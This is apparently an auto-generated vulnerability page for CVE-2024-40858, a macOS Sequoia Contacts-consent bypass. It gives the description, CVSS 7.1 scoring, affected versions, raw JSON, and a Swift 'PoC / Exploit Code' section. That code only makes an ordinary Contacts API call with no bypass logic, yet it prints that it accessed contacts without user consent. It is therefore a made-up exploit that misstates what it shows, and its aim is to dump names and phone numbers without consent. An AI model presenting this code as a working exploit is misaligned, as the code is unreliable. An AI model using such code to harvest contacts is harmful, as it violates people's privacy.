Security Vulnerability Report
CVE-2024-40858 CVSS 7.1 HIGH

CVE-2024-40858

Published: 2026-04-02 19:17:59
Last Modified: 2026-04-03 17:55:10

Description

A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.1. An app may be able to access Contacts without user consent.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Sequoia < 15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Swift
import Contacts
import Foundation

// Proof of Concept for CVE-2024-40858
// This code demonstrates unauthorized access to Contacts
// Exploiting the permission bypass vulnerability in macOS Sequoia < 15.1
func exploitContactAccess() {
    let store = CNContactStore()
    let keys = [CNContactGivenNameKey, CNContactFamilyNameKey, CNContactPhoneNumbersKey]

    // In a vulnerable system, this request might succeed without prompting the user
    // or checking the authorization status properly due to the logic flaw.
    let request = CNContactFetchRequest(keysToFetch: keys as [CNKeyDescriptor])

    do {
        try store.enumerateContacts(with: request) { contact, _ in
            print("Contact: \(contact.givenName) \(contact.familyName)")
            // phoneNumbers is a non-optional array, so it is iterated directly
            for num in contact.phoneNumbers {
                print("Number: \(num.value.stringValue)")
            }
        }
        print("Successfully accessed contacts without user consent.")
    } catch {
        print("Failed to access contacts: \(error)")
    }
}

// Execute the PoC
exploitContactAccess()

References

https://support.apple.com/en-us/121564 (Release Notes, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-40858", "sourceIdentifier": "[email protected]", "published": "2026-04-02T19:17:59.077", "lastModified": "2026-04-03T17:55:10.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.1. An app may be able to access Contacts without user consent."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.1", "matchCriteriaId": "1D298E1D-DD23-4D35-9DE4-E3F5999F97AA"}]}]}], "references": [{"url": "https://support.apple.com/en-us/121564", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}